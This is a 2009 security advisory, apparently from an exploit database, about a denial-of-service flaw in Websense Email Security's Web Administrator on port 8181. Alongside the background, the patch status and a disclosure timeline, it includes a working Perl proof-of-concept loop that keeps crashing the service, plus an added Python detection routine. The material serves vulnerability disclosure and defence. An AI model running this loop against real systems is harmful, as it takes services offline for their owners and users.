0day.today - Biggest Exploit Database in the World.
Websense Email Security DoS
Title:                  Websense Email Security Web Administrator DoS
Severity:               Low
Vendor:                 Websense (http://www.websense.com/)
Affected Products:      Websense Email Security v7.1
                        Personal Email Manager v7.1
Not Affected Products:  Websense Email Security v7.1 Hotfix 4
                        Personal Email Manager v7.1 Hotfix 4
Remote Exploitable:     Yes
Local Exploitable:      Yes
Patch Status:           Patched with Hotfix 4
Disclosure Policy:      http://sotiriu.de/policy.html
Thanks to:              Thierry Zoller: for the permission to use his Policy

Background:
===========
Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection. (Product description from Websense Website)

The Websense Email Security Web Administrator is a web front end that gives access to message administration and directory management and lets you view the log.

Description:
============
The Web Administrator front end (STEMWADM.EXE) listens by default on port TCP/8181. If an attacker sends an HTTP request to port 8181 without waiting for a response, the web server crashes.

The proof of concept script just sends a "GET /index.asp" and closes the socket. The server can no longer respond to the request and dies. By default the service always restarts after a crash, so the PoC keeps sending the request until it is stopped.

Proof of Concept:
=================
#!/usr/bin/perl
use Socket;

(($target = $ARGV[0]) && ($port = $ARGV[1])) ||
    die "Usage: $0 ", "<target> <port> \n";

print "\nThe Webserver on http://$target:$port should be dead until ",
      "this script is running\n";

# The service restarts after each crash, so the request is repeated.
while (1) {
    $ip = inet_aton($target) || die "host($target) not found.\n";
    $sockaddr = pack_sockaddr_in($port, $ip);
    socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";
    connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";
    # Send the request and close the socket without waiting for a response.
    print SOCKET "GET /index.asp";
    print "Request sent ...\n";
    close(SOCKET);
    sleep 1;
};

Solution:
=========
Vendor released a patch.
http://tinyurl.com/yhe3hqa

Disclosure Timeline (YYYY/MM/DD):
=================================
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent their PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verified the finding and fixed it. The patch will be available in Version 7.2, which will be released in ~2 weeks
2009.10.13: Asked for a list of affected versions/products and changed the release date to 2009.10.29. (no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
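
Detection logic for the pattern in the Description (a request to TCP/8181 that is never completed and is closed by the client before any response), added here as an example and not part of the original advisory. The connection-record fields (`ts`, `src`, `dport`, `payload`, `closed_by`, `bytes_from_server`), the threshold and the time window are assumptions about what a network sensor exports, and the sample records are constructed.

```python
from collections import defaultdict

ADMIN_PORT = 8181         # default Web Administrator port named in the advisory
HEADER_END = b"\r\n\r\n"  # a complete HTTP request header ends with a blank line

def is_truncated_request(payload: bytes) -> bool:
    """Client sent data, but never a complete HTTP request header."""
    return bool(payload) and HEADER_END not in payload

def flag_sources(records, threshold=3, window=10.0):
    """Map source -> peak count of truncated, unanswered, client-closed
    connections to ADMIN_PORT seen inside any `window`-second span,
    for sources whose peak reaches `threshold`."""
    hits = defaultdict(list)
    for r in records:
        if (r["dport"] == ADMIN_PORT and r["closed_by"] == "client"
                and r["bytes_from_server"] == 0
                and is_truncated_request(r["payload"])):
            hits[r["src"]].append(r["ts"])
    flagged = {}
    for src, times in hits.items():
        times.sort()
        best = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # shrink the sliding window
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[src] = best
    return flagged

def rec(ts, src, payload, closed_by="client", from_server=0, dport=ADMIN_PORT):
    """Build one constructed connection record (hypothetical sensor schema)."""
    return {"ts": ts, "src": src, "dport": dport, "payload": payload,
            "closed_by": closed_by, "bytes_from_server": from_server}

# Constructed sample data, not taken from a real capture.
SAMPLE = (
    [rec(float(i), "192.0.2.10", b"GET /index.asp") for i in range(5)]
    + [rec(2.5, "198.51.100.7",
           b"GET /index.asp HTTP/1.1\r\nHost: mail\r\n\r\n", "server", 4096)]
    + [rec(7.0, "203.0.113.5", b"GET /index.asp")]
    + [rec(float(i), "192.0.2.44", b"GET /", dport=80) for i in range(5)]
)

if __name__ == "__main__":
    for src, count in flag_sources(SAMPLE).items():
        print(f"{src}: {count} truncated requests to port {ADMIN_PORT}")
```

A single truncated request is common on lossy links, which is why the check requires repetition from one source inside the window before flagging it.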